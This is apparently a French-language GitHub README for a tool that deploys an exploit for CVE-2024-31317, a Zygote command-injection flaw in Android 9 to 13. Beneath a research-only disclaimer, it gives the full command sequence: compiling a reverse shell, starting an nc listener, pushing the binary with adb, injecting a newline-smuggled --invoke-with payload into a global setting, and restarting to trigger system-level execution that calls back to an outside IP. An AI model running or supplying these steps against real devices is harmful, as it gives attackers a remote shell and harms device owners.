
CVE-2024-31317 Outil de recherche et de déploiement de la vulnérabilité d'injection de commande Zygote Android | Cadre d'exploitation de vulnérabilités Android 9-13
Ce projet est destiné uniquement à des fins de recherche en sécurité et d'éducation. L'utilisation de cet outil pour des tests non autorisés est illégale. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés.
CVE-2024-31317 est une faille de sécurité critique affectant les appareils Android 9 à Android 13, permettant à une application disposant de l'autorisation WRITE_SECURE_SETTINGS d'obtenir une exécution au niveau système via une injection de commandes.
Ce projet fournit une analyse technique détaillée de la vulnérabilité, un code de preuve de concept et des outils de déploiement automatisés.
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# Démarrer l'écouteur
nc -lvnp 4444
# Pousser et exécuter
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# Injecter la charge utile
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# Déclencher la vulnérabilité
adb shell stop && adb shell start
Ce projet est destiné uniquement à des fins de recherche en sécurité et d'éducation. En utilisant cet outil, vous acceptez :
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails
fcy10012 - GitHub
Projet de référence : WebLDix/CVE-2024-31317-PoC-Deployer
⭐ Si ce projet vous est utile, veuillez lui attribuer une étoile !